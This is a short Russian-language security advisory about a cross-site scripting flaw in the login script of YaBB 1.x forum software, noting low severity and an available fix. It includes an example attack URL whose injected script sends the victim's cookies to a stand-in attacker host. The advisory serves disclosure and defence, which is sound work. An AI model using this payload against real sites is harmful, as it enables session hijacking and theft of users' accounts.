Security Lab

Межсайтовый скриптинг в YaBB

Дата публикации:21.10.2002
Дата изменения:17.10.2006
Всего просмотров:1856
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: YaBB 1.x
Описание: YaBB (Yet Another Bulletin Board) – BBS система от http://www.yabb.org/.

Межсайтовый скрптинг обнаружен в сценарии входа в систему. Атакующий может создать злонамеренную ссылку, содержащую произвольный код сценария, который будет выполнен в браузере пользователя, в контексте уязвимого сайта. Пример:

http://example.com/forums/index.php?
board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>
window.location.href(%22http://www.attackersite.example.com/hack.asp?%22%
2Bdocument.cookie)</script>
уязвимость обнаружена в YaBB 1.40-1.41
Ссылки: Пример ASP сценария, который используется для перехвата куки
New Vulnerability on YaBB 1.4.0 and YaBB 1.4.1 forums